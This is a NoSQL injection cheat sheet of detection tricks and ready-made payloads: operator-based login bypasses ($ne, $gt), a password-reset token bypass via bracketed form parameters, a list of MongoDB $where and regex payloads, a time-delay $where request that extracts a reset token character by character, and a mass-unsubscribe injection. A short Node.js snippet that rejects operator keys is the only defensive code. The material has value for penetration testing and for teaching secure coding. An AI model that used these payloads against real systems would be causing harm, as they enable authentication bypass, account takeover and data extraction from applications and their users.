NoSQL injection

NoSQL injection: methodology and payloads

Detection

http://target.com/search?id=12345

Change to:

http://target.com/search?id[$ne]=12345
http://target.com/search?id[$gt]=0

Inject each of the following special characters and observe any changes in the response:

$
{
}
\
"
`
;
%00

Login Bypass

POST /customer_zone/sign_in HTTP/2.0
Host: example.com
Content-Type: application/json
User-Agent: ...

{
    "customer_email": "customer@example.com",
    "password": { "$gt": "" }
}

Reset Password - Use parameter arrays

If the target only accepts parameters as form data rather than JSON, the same operator object can often still be delivered: some parameter-parsing packages support bracketed parameter arrays and automatically convert a field such as token[$ne]=null into the nested object {"token": {"$ne": null}} before it reaches the query. The JSON request below and the form-encoded one after it are therefore equivalent.

POST /auth/reset-password HTTP/2
Host: app.example.com
Content-Type: application/json; charset=utf-8
User-Agent: ...

{
    "email": "admin@example.com",
    "token": {"$ne": null},
    "newPassword": "hunter2"
}

POST /auth/reset-password HTTP/2
Host: app.example.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: ...

email=admin@example.com&token[$ne]=null&newPassword=hunter2

API

A basic bypass for a Content-Type of application/x-www-form-urlencoded might look like this:

user[$ne]=fu&pass[$ne]=bar

If the login endpoint is accepting JSON, it might look something like this:

{"user": {"$ne": "fu"}, "pass": {"$ne": "bar" }}
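As an added defensive example (not code from the original page), the Node.js snippet below imitates the bracket-style form parsing that turns user[$ne]=fu into an operator object, then shows the check a login handler should apply before the body reaches a MongoDB query. parseBracketForm, hasOperatorKeys and buildLoginQuery are hypothetical names; the parser is deliberately one level deep.

```javascript
// Minimal imitation of bracket-style form parsing ("a[b]=c" -> {a: {b: "c"}})
// as extended urlencoded parsers do. One nesting level is enough to show
// why "user[$ne]=fu&pass[$ne]=bar" becomes a MongoDB operator object.
function parseBracketForm(body) {
  const out = {};
  for (const [key, value] of new URLSearchParams(body)) {
    const m = /^([^\[]+)\[([^\]]*)\]$/.exec(key);
    if (m) {
      out[m[1]] = out[m[1]] || {};
      out[m[1]][m[2]] = value;
    } else {
      out[key] = value;
    }
  }
  return out;
}

// Recursively reject any key that MongoDB could read as an operator ($ne, $gt,
// $where, ...) or as a dotted field path, regardless of nesting depth.
function hasOperatorKeys(value) {
  if (Array.isArray(value)) return value.some(hasOperatorKeys);
  if (value && typeof value === 'object') {
    return Object.entries(value).some(
      ([k, v]) => k.startsWith('$') || k.includes('.') || hasOperatorKeys(v)
    );
  }
  return false;
}

// Accept credentials only as plain strings. The username becomes the only query
// predicate; the password is compared against the stored hash, never queried.
function buildLoginQuery(body) {
  if (hasOperatorKeys(body)) throw new Error('operator injection rejected');
  const { user, pass } = body;
  if (typeof user !== 'string' || typeof pass !== 'string') {
    throw new Error('credentials must be strings');
  }
  return { query: { user }, password: pass };
}

// Helper for exercising the check on constructed request bodies.
function check(body) {
  try { buildLoginQuery(body); return 'accepted'; } catch (e) { return e.message; }
}
```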

MongoDB Payloads

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
|| 1==1//
|| 1==1%00
}, { password : /.*/ }
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}

Time delays

Extract data with time delays

POST /auth/reset-password HTTP/2
Host: app.example.com
Content-Type: application/json; charset=utf-8
User-Agent: ...

{
  "email": "admin@example.com",
  "token": {
      "$where": "if(this.token.startsWith('a')) {sleep(5000); return true;} else {return true;}"
  },
  "password": "hunter2"
}

Server-side JavaScript code

Unsubscribe all emails

POST /newsletter/unsubscribe HTTP/2
Host: app.example.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: ...

email=user@example.com'+||+TRUE;//&token=
